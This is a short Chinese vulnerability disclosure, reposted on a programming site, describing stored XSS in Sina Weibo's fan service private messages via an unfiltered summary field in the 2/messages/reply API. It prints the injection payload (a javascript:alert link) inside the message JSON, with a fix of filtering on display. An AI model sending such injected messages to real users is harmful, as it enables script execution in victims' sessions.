通过粉丝服务平台开发模式给用户发送图文类型私信时,
可以通过构造内容,使得用户收到的私信在显示的时候出现XSS
用户开通粉丝服务平台后,通过调用开放平台2/messages/reply接口可以给用户发送图文信息
在该信息的summary字段存在过滤不严,通过构造summary字段,传递XSS值,在用户收到消息显示的时候存在xss
summary字段:
"></a><a href="javascript:alert('1');">你好</a><a "
构造成的值:
[{"image":"http:\/\/www.wooyun.org\/images\/ewm.jpg","display_name":"\u6d4b\u8bd5","summary":""><\/a><a href="javascript:alert('1');">\u4f60\u597d<\/a><a "","url":"http:\/\/www.baidu.com"}]
用户收到后在消息框显示:
点击后:
修复方案:
在显示的地方对summary进行过滤
查看更多关于新浪微博粉丝服务平台回复图文信息在私信框中的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15737